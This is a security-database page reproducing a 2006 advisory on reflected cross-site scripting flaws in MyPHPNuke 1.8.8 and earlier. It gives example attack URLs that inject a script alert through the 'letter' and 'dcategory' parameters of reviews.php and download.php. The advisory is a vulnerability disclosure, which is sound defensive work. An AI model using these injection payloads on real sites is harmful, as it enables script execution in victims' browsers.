|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 491 CVE : CVE-2006-0923 SecurityRisk : Low  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : nukedx nukedx com Published : 26.02.2006
Advisory Content : --Security Report-- Advisory: MyPHPNuke <= 1.8.8 multiple XSS vulnerabilities --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 24/02/06 05:56 PM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx (at) nukedx (dot) com [email concealed] Web: http://www.nukedx.com } --- Vendor: MPN (www.myphpnuke.com) Version: 1.8.8 and prior versions must be affected. About: Via this method remote attacker can make malicious links for clicking and when victim clicks this links victim's browser would be inject with XSS. Level: Harmless --- How&Example: GET -> http://[site]/reviews.php?op=reviews&letter=[XSS] EXAMPLE -> http://[site]/reviews.php?op=reviews&letter=<script>alert('X');</script> GET -> http://[site]/download.php?sortby=&dcategory=[XSS]&sortby= EXAMPLE -> http://[site]/download.php?sortby=&dcategory=<script>alert('X');</script > -- Timeline: * 24/02/2006: Vulnerability found. * 24/02/2006: Contacted with vendor and waiting reply. -- Original advisory: http://www.nukedx.com/?viewdoc=12  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |